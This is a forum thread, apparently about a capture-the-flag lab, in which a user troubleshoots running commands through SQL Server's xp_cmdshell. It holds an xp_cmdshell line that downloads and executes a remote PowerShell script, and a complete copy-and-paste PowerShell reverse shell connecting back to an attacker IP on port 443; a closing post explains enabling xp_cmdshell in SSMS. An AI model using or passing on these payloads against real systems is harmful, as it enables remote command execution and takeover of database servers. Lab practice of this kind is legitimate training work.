xp_cmdshell error

SQL> xp_cmdshell "powershell "IEX (New-ObjectNet.WebClient).DownloadString("http://10.10.15.159/shell.ps1\“);”
output


New-ObjectNet.WebClient : The term ‘New-ObjectNet.WebClient’ is not recognized as the name of a cmdlet, function,

script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is

correct and try again.

At line:1 char:6

  • IEX (New-ObjectNet.WebClient).DownloadString("http://10.10.15.159/she

  •  ~~~~~~~~~~~~~~~~~~~~~~~                                                     
    
    • CategoryInfo : ObjectNotFound: (New-ObjectNet.WebClient:String) , CommandNotFoundException

    • FullyQualifiedErrorId : CommandNotFoundException

i am getting this error please help

Powershell is saying New-ObjectNet.WebClient is incorrect. It is saying this because there is no powershell object named New-ObjectNet.WebClient

Did you mean:
New-Object Net.WebClient
?

how can i solve this error

@metin1655 said:

how can i solve this error

Have you tried correcting the typo?

yes i did thanks
but now another mistake

That looks like something in shell.ps1 isnt coded correctly.

The error is saying it doesn’t like the ampersand in: iex$data2>&1

Without knowing what your shell.ps1 contains, my first guess would be it is the exact same typo. The bit should probably read: iex $data 2>&1

Spaces really do matter. If you are copying/pasting from an online guide, it might be badly formatted.

thanks I’ll try

this time this

i can’t believe i can finish this

@metin1655 said:

Resim Yükle - Hızlı Resim - Resim Paylaş - Resmim.Net

this time this

i can’t believe i can finish this

There is no screenshot at that link.

You might find it easier to copy and paste the text. That way you can quickly see if there is a space missing, which is overwhelmingly likely to be the problem.

sorry
https://resimyukle.xyz/i/5G17VB

It says the module can’t be loaded. That implies something is wrong with how the system is interacting with powershell.

Which box is it? Because there might be something you need to do first, or this might not be the correct path.

Type your comment> @metin1655 said:

sorry
https://resimyukle.xyz/i/5G17VB

I haven’t passed this error yet

@metin1655 said:

Type your comment> @metin1655 said:

sorry
https://resimyukle.xyz/i/5G17VB

I haven’t passed this error yet

It says the module can’t be loaded. That implies something is wrong with how the system is interacting with powershell.

Which box is it? Because there might be something you need to do first, or this might not be the correct path.

@TazWake said:
That looks like something in shell.ps1 isnt coded correctly.

The error is saying it doesn’t like the ampersand in: iex$data2>&1

Without knowing what your shell.ps1 contains, my first guess would be it is the exact same typo. The bit should probably read: iex $data 2>&1

Spaces really do matter. If you are copying/pasting from an online guide, it might be badly formatted.

going to post the correct syntax shell.ps1 here, with appropriate spacing. (copy and paste friendly)

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.8”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.close()

VERY IMPORTANT - after TCPClient, replace the IP with your IP!

From within SSMS, right click on the instance name and select Facets.

In the Facet dropdown, change to Server Security as shown below.

Enabled as needed to either True or False. After changing the value, click OK to save the setting and the change will take effect immediately. There is not a need to enable show advanced options or use reconfigure, the GUI takes care of this automatically.

Regards,
Rachel Gomez